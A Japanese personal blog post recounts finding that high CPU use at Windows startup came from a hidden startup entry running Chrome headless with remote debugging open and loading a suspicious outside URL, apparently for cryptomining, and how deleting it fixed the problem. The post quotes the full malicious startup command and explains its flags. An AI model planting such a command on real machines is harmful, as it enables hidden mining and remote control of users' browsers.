【私が犯した大マヌケなミス】Windows起動直後にCPU使用率100%!タスクマネージャで確認するとChromeが原因だった。。。

Chrome

ある日、PCを起動すると・・・

パソコンが唸っていて、動作も重い。

何かおかしい。

タスクマネージャーを起動してみてみると、

Chromeの使用率がとても高い!

原因がわかったので一応解決法を紹介します。

いやぁ、本当にマヌケでした。

しかし、このウイルスの作者は少しずる賢いです。

色々ネットで検索したけどどれも違った!

ChromeがCPU使用率100%になる原因を調べても私の条件にあてはまるものはなく、どれも効果がありませんでした。

アンチウイルスソフトでスキャンをかけても何も見つからない・・・。

原因が分かると、そりゃそうだ!となりましたけどね笑

原因はスタートアップにあった。

では、何が原因だったのか。

スタートアップを覗いたら原因が判明しました。

私のPCのスタートアップを覗くと以下のコマンドが実行されていました。

“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” –headless –disable-gpu –remote-debugging-port=9222 http://de-mi-nis-ner.info/cdn-38.html?t=0.4

簡単にこのコマンドを解説すると、

–headless –disable-gpu –remote-debugging-port=9222

このコマンドは、Chromeのウィンドウを表示せずに実行する際に使用されます。

そのあとのURLは開くURLです。

つまり、バックグラウンドでttp://de-mi-nis-ner.info/cdn-38.html?t=0.4に繋がっていました。

これを削除したらすっかり元どうりになりましたとさ。

このコマンドを悪用するとバックグラウンドでマイニングをすることができてしまいます。

他にも色々と出来てしまうので危険ですね。

私みたいな失態を犯す人は滅多にいないと思いますが・・・。

↓応援よろしくお願いします!↓


人気ブログランキング
0

シェアする

  • このエントリーをはてなブックマークに追加

フォローする